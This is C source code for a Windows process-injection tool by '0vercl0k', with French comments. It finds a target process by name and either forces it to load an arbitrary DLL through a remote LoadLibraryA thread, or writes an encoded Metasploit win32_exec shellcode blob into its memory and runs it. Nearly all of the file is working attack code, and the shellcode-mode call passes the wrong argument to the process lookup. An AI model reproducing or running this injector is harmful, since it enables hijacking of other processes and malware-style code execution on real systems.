injectdll.html

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <tlhelp32.h>
#define USAGE "./%s [-dll <processus> <full path dll>|-sh <processus>]"

long NomProcessusToPid(char* process);
int InjectDllDansProcessus(long pidProcAInjecter , char* fullPathDll);
int InjectShellcodeDansProcessus(long pidProcAInjecter);

int main(int argc ,char* argv[] )
{
    printf("Inject Dll into fucking process par 0vercl0k.\n\n");

    if(!argv[1] || !argv[2] ){printf(USAGE,argv[0]); return 0;}

    if(!strcmp("-dll",argv[1]) && argv[3])
    {
        if(InjectDllDansProcessus(NomProcessusToPid(argv[2]),argv[3]) == 1)
            printf("[*] Ownage du processus avec succes.\n");
    }
    else if(!strcmp("-sh",argv[1]))
    {
        if(InjectShellcodeDansProcessus(NomProcessusToPid(argv[0])))
            printf("[*] Ownage du processus avec succes.\n");
    }
    else
    {
        printf(USAGE,argv[0]);
    }
    return 0;
}

long NomProcessusToPid(char* process)
{
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    PROCESSENTRY32 structprocsnapshot = {0};

    structprocsnapshot.dwSize = sizeof(PROCESSENTRY32);

    if(snapshot == INVALID_HANDLE_VALUE)return 0;
    if(Process32First(snapshot,&structprocsnapshot) == FALSE)return 0;

    while(Process32Next(snapshot,&structprocsnapshot) )
    {
       if(!strcmp(structprocsnapshot.szExeFile,process))
       {
            CloseHandle(snapshot);
            return structprocsnapshot.th32ProcessID;
       }
    }
    CloseHandle(snapshot);
    return 0;
}

int InjectDllDansProcessus(long pidProcAInjecter , char* fullPathDll)
{
    long tailleStringDll = strlen(fullPathDll) + 1;

    printf("[+] Ouverture du process.\n");

    HANDLE handleProcess = OpenProcess(PROCESS_ALL_ACCESS , FALSE , pidProcAInjecter);// OpenProcess -> http://msdn2.microsoft.com/en-us/library/ms684320.aspx.
    if(handleProcess == NULL)return 0;

    printf("[+] Reservation et écriture dans la mémoire du processus.\n");
    LPVOID addrEspaceReserve = VirtualAllocEx( handleProcess , NULL , tailleStringDll , MEM_COMMIT , PAGE_EXECUTE_READWRITE); // VirtualAllocEx -> http://msdn2.microsoft.com/en-us/library/aa366890.aspx.
    if(addrEspaceReserve == NULL)
        return 0;

    int retourFonctionWrite = WriteProcessMemory( handleProcess , addrEspaceReserve , fullPathDll , tailleStringDll , 0); // WriteProcessMemory() -> http://msdn2.microsoft.com/en-us/library/ms681674.aspx.
    if(retourFonctionWrite == 0)
        return 0;

    printf("[+] Creation du thread dans le processus.\n");
    DWORD identificateurThread ;
    LPTHREAD_START_ROUTINE addrLoadLibrary = (LPTHREAD_START_ROUTINE)GetProcAddress(LoadLibrary("kernel32"),"LoadLibraryA"); // GetProcAddress() -> http://msdn2.microsoft.com/en-us/library/ms683212.aspx. LodLibrary() ->
    HANDLE retourFonctionCreate = CreateRemoteThread( handleProcess , NULL , 0 , addrLoadLibrary , addrEspaceReserve , 0 , &identificateurThread ); // CreateRemoteThread() -> http://msdn2.microsoft.com/en-us/library/ms682437.aspx.
    if(retourFonctionCreate == NULL)
        return 0;

    WaitForSingleObject(retourFonctionCreate,INFINITE); //WaitForSingleObject() -> http://msdn2.microsoft.com/en-us/library/ms687032.aspx.
    VirtualFreeEx( handleProcess , addrEspaceReserve , 0 , MEM_DECOMMIT); //VirtualFreeEx() -> http://msdn2.microsoft.com/en-us/library/aa366894.aspx

    CloseHandle(handleProcess);
    CloseHandle(retourFonctionCreate);


    return 1;
}

int InjectShellcodeDansProcessus(long pidProcAInjecter)
{
   /* win32_exec -  EXITFUNC=thread CMD=taskmgr.exe Size=168 Encoder=PexFnstenvSub http://metasploit.com */
    char sh[] =
    "\x29\xc9\x83\xe9\xdc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x40"
    "\x3b\x1f\x1f\x83\xeb\xfc\xe2\xf4\xbc\xd3\x5b\x1f\x40\x3b\x94\x5a"
    "\x7c\xb0\x63\x1a\x38\x3a\xf0\x94\x0f\x23\x94\x40\x60\x3a\xf4\x56"
    "\xcb\x0f\x94\x1e\xae\x0a\xdf\x86\xec\xbf\xdf\x6b\x47\xfa\xd5\x12"
    "\x41\xf9\xf4\xeb\x7b\x6f\x3b\x1b\x35\xde\x94\x40\x64\x3a\xf4\x79"
    "\xcb\x37\x54\x94\x1f\x27\x1e\xf4\xcb\x27\x94\x1e\xab\xb2\x43\x3b"
    "\x44\xf8\x2e\xdf\x24\xb0\x5f\x2f\xc5\xfb\x67\x13\xcb\x7b\x13\x94"
    "\x30\x27\xb2\x94\x28\x33\xf4\x16\xcb\xbb\xaf\x1f\x40\x3b\x94\x77"
    "\x7c\x64\x2e\xe9\x20\x6d\x96\xe7\xc3\xfb\x64\x4f\x28\xd4\xd1\xff"
    "\x20\x53\x87\xe1\xca\x35\x48\xe0\xa7\x4f\x7e\x6c\x2b\x56\x78\x6d"
    "\x6e\x5e\x67\x7a\x40\x3b\x1f\x1f";

    long tailleStringSh = strlen(sh);
    printf("[+] Ouverture du process.\n(%ld)",tailleStringSh);

    HANDLE handleProcess = OpenProcess(PROCESS_ALL_ACCESS , FALSE , pidProcAInjecter);// OpenProcess -> http://msdn2.microsoft.com/en-us/library/ms684320.aspx.
    if(handleProcess == NULL)return 0;

    printf("[+] Reservation et écriture dans la mémoire du processus.\n");
    LPVOID addrEspaceReserve = VirtualAllocEx( handleProcess , NULL , tailleStringSh , MEM_COMMIT , PAGE_EXECUTE_READWRITE); // VirtualAllocEx -> http://msdn2.microsoft.com/en-us/library/aa366890.aspx.
    if(addrEspaceReserve == NULL)
        return 0;

    int retourFonctionWrite = WriteProcessMemory( handleProcess , addrEspaceReserve , sh , tailleStringSh , 0); // WriteProcessMemory() -> http://msdn2.microsoft.com/en-us/library/ms681674.aspx.
    if(retourFonctionWrite == 0)
        return 0;

    printf("[+] Creation du thread dans le processus.\n");
    DWORD identificateurThread ;
    HANDLE retourFonctionCreate = CreateRemoteThread( handleProcess , NULL , 0 , (LPTHREAD_START_ROUTINE)addrEspaceReserve , NULL , 0 , &identificateurThread ); // CreateRemoteThread() -> http://msdn2.microsoft.com/en-us/library/ms682437.aspx.
    if(retourFonctionCreate == NULL)
        return 0;

    WaitForSingleObject(retourFonctionCreate,INFINITE); //WaitForSingleObject() -> http://msdn2.microsoft.com/en-us/library/ms687032.aspx.
    VirtualFreeEx( handleProcess , addrEspaceReserve , 0 , MEM_DECOMMIT); //VirtualFreeEx() -> http://msdn2.microsoft.com/en-us/library/aa366894.aspx
    CloseHandle(handleProcess);
    CloseHandle(retourFonctionCreate);
    return 1;
}